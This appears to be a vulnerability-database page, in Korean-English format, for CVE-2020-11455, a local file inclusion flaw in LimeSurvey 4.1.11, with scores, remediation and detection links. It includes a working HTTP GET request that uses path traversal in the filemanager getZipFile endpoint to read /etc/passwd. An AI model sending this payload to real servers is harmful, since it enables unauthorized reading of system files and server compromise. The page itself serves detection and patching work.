🔙 목록으로 돌아가기

CVE-2020-11455: LimeSurvey 4.1.11 - Local File Inclusion

TitleLimeSurvey 4.1.11 - Local File Inclusion
Authordaffainfo
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.
RemediationUpgrade to the latest version of LimeSurvey (4.1.12 or higher) which includes a fix for this vulnerability.
CVSS Score9.8
EPSS Score0.93403
CVE IDCVE-2020-11455
CWE IDCWE-22
Tags cve2020 cve lfi edb packetstorm limesurvey vkev vuln

🔍 Vulnerability Description

LimeSurvey before 4.1.12+200324 is vulnerable to local file inclusion because it contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.

🌐 HTTP Request

GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/9.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-11455.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-11455.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A